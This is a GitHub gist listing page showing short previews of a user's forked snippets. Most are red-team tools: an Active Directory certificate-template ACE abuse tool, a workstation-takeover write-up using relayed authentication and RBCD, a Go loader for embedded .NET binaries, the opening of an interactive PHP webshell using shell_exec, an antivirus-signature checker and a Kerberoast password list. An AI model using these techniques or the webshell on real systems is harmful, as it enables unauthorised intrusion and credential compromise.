Skip to content

Instantly share code, notes, and snippets.

@edermi
edermi / SharpApprover.cs
Created Sep 22, 2021 — forked from dmchell/SharpApprover.cs
Reset the mspki-enrollment-flag attribute when you possess a write ACE on a vulnerable certificate template
View SharpApprover.cs
using System;
using System.DirectoryServices;
namespace SharpApprover
{
class Program
{
public static void SetAdInfo(string objectFilter,
int objectValue, string LdapDomain)
@edermi
edermi / Workstation-Takeover.md
Created Sep 19, 2021 — forked from gladiatx0r/Workstation-Takeover.md
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure
View Workstation-Takeover.md

Overview

In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by;

  • Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
  • Relaying that machine authentication to LDAPS for configuring RBCD
  • RBCD takeover

The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.

@edermi
edermi / go-sharp-loader.go
Created Apr 4, 2021 — forked from ropnop/go-sharp-loader.go
Example Go file embedding multiple .NET executables
View go-sharp-loader.go
package main
/*
Example Go program with multiple .NET Binaries embedded
This requires packr (https://github.com/gobuffalo/packr) and the utility. Install with:
$ go get -u github.com/gobuffalo/packr/packr
Place all your EXEs are in a "binaries" folder
@edermi
edermi / shell.php
Created Dec 8, 2020 — forked from mrpapercut/shell.php
Interactive PHP webshell
View shell.php
<?php
function escapetext($text) {
return str_replace("\n", "<br>", htmlentities($text));
}
function exec_command($cmd, $internal = false) {
try {
$shell_exec = shell_exec($cmd);
} catch (Exception $e) {
View pydefendercheck.py
##################################################
## PyDefenderCheck - Python implementation of DefenderCheck
##################################################
## Author: daddycocoaman
## Based on: https://github.com/matterpreter/DefenderCheck
##################################################
import argparse
import enum
@edermi
edermi / xml2db.py
Created Feb 18, 2019
Quick and dirty python3 nmap/masscan xml to sqlite3 converter. Only converts address, port and if state is 'open' or not
View xml2db.py
#!/usr/bin/env python3
# For untrusted XML input, use a hardened parser, see https://docs.python.org/3/library/xml.html
import xml.etree.ElementTree as ET
import sqlite3
import argparse
import sys
@edermi
edermi / kerberoast_pws.xz
Last active Sep 10, 2020
edermi Kerberoast PW list (XZ format)
View kerberoast_pws.xz
This file has been truncated, but you can view the full file.
@edermi
edermi / snallygaster.txt
Created Apr 26, 2018
snallygaster.txt - a wordlist to use with e.g. gobuster to query the same resources as @hannob's snallygaster
View snallygaster.txt
lfm.php
.idea/WebServers.xml
config/databases.yml
.git/config
.svn/entries
CVS/Root
server-status
core
sftp-config.json
WS_FTP.ini
@edermi
edermi / unbound.conf
Created Dec 23, 2017
My unbound config
View unbound.conf
server:
# log verbosity
verbosity: 1
use-syslog: yes
interface: 127.0.0.1
interface: ::1
do-ip6: yes
View keybase.md

Keybase proof

I hereby claim:

  • I am edermi on github.
  • I am edermi (https://keybase.io/edermi) on keybase.
  • I have a public key ASCW4hvy-ACn2JOQgRhz__YJFW6Y069muaOF5HF3GWeMEAo

To claim this, I am signing this object: